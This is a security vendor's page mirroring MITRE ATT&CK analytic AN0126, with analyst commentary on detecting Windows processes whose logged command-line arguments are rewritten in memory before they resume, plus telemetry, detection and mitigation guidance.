Live Active security incident? Get immediate response
MITRE ATT&CK® Analytic

AN0126: Analytic 0126

Inconsistencies between process command-line arguments logged at creation time and subsequent process behavior. Defender perspective: monitoring for processes launched in a suspended state, followed by memory modifications (e.g., WriteProcessMemory targeting the PEB) that overwrite arguments before execution resumes. Detection also includes observing anomalous behaviors from processes whose logged arguments do not align with executed activity (e.g., network connections, file writes, or registry modifications).

EnterpriseAN0126AnalyticObject v1.0 Modified
Discuss defensive coverage Back to ATT&CK
Glexia's Take

Analyst context for executives and security teams

Analyst confidence Medium

AN0126 matters because it focuses on a gap executives and SOC leaders often assume is covered: the command line recorded when a Windows process starts may not match what the process later does. If defenders rely only on process creation logs, suspicious execution can be missed when arguments are changed in memory before the process resumes or when runtime behavior contradicts the original logged command line.

Executive priority

Treat this as a validation item for Windows endpoint monitoring quality, not just another alert rule. Leaders should ask whether SOC and IR teams can prove they collect both process-start evidence and subsequent behavior evidence such as memory modification, network activity, file writes, and registry changes. This supports incident decision-making, audit evidence for endpoint visibility, and prioritization of EDR/SIEM coverage where command-line logging alone is insufficient.

Technical view

For Windows, validate detection logic that correlates process creation command-line arguments with later process behavior. The official analytic highlights processes launched in a suspended state, memory modifications such as WriteProcessMemory targeting the PEB, argument overwrites before execution resumes, and anomalous runtime activity that does not align with the logged arguments. Because no ATT&CK tactics or relationship context are supplied, implementation should remain behavior-focused rather than attribution- or campaign-focused.

Likely telemetry

  • Windows process creation events with full command-line arguments
  • Process state or thread activity indicating suspended launch and later resume
  • Endpoint telemetry for cross-process memory modification, including WriteProcessMemory-like behavior
  • Memory or process metadata relevant to PEB argument changes where available
  • Process-correlated network connections

Detection direction

  • Confirm that process creation logs are not the only data source used for this behavior; compare logged arguments against later observed process activity.
  • Tune correlation around processes that start suspended, are modified in memory, and then resume execution.
  • Look for mismatches between benign-looking command lines and subsequent network, file, or registry activity inconsistent with those arguments.
  • Baseline legitimate software in the local environment before treating suspended launch or memory modification alone as high confidence.
  • Document blind spots where endpoint tooling cannot observe memory modification, PEB changes, or process-resume behavior.

Mitigation priorities

  • Prioritize endpoint visibility: ensure Windows command-line logging and EDR process telemetry are enabled where policy allows.
  • Ensure SOC workflows correlate process creation, memory modification, and runtime behavior rather than reviewing each signal in isolation.
  • Use least-privilege and application control policies where appropriate to reduce unnecessary process manipulation opportunities.
  • Preserve relevant endpoint telemetry for incident response so analysts can reconstruct process argument changes and subsequent activity.
  • Review detection coverage as part of managed detection, IR readiness, and compliance evidence for endpoint monitoring controls.
Analyst notes and limits

The supplied object is a detection analytic, not a full ATT&CK technique entry. Its practical value is in testing whether defenders can detect command-line argument inconsistency on Windows by correlating creation-time logging with later memory and behavior telemetry.

Official detection text, tactics, relationships, aliases, and labels were not supplied. This take does not infer adversary attribution, active exploitation, impact, or coverage beyond the Windows platform and official description provided. Local telemetry availability and baselining are required to determine operational effectiveness.

Official MITRE ATT&CK definition

Analytic 0126

Inconsistencies between process command-line arguments logged at creation time and subsequent process behavior. Defender perspective: monitoring for processes launched in a suspended state, followed by memory modifications (e.g., WriteProcessMemory targeting the PEB) that overwrite arguments before execution resumes. Detection also includes observing anomalous behaviors from processes whose logged arguments do not align with executed activity (e.g., network connections, file writes, or registry modifications).

View the same entry on attack.mitre.org (MITRE-hosted reference; in-page links above use the Glexia ATT&CK library.)

Glexia analysis

How security teams should use this page

Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.

Relationship explorer

All related ATT&CK context

No relationships are available in the current normalized data for this object.

Change history

Object version and sync metadata

The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE’s own release notes and roadmap, see ATT&CK resources — Updates .

ATT&CK release
19.1
Object version
1.0
Created
Modified
Raw hash
693608e7ce7af5c6...
Imported snapshots across ATT&CK releases (1)
Release Bundle imported Object version Modified Status Raw hash
19.1 1.0 Current bundle 693608e7ce7a…
Raw source

Mirrored ATT&CK source object

The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.

Open mirrored raw JSON Open MITRE-hosted copy
Source references

External references and citations

MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.

  1. [1]
    mitre-attack AN0126
    Open source URL
Source and licensing

Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.

Official MITRE ATT&CK site Official STIX data repository MITRE ATT&CK terms of use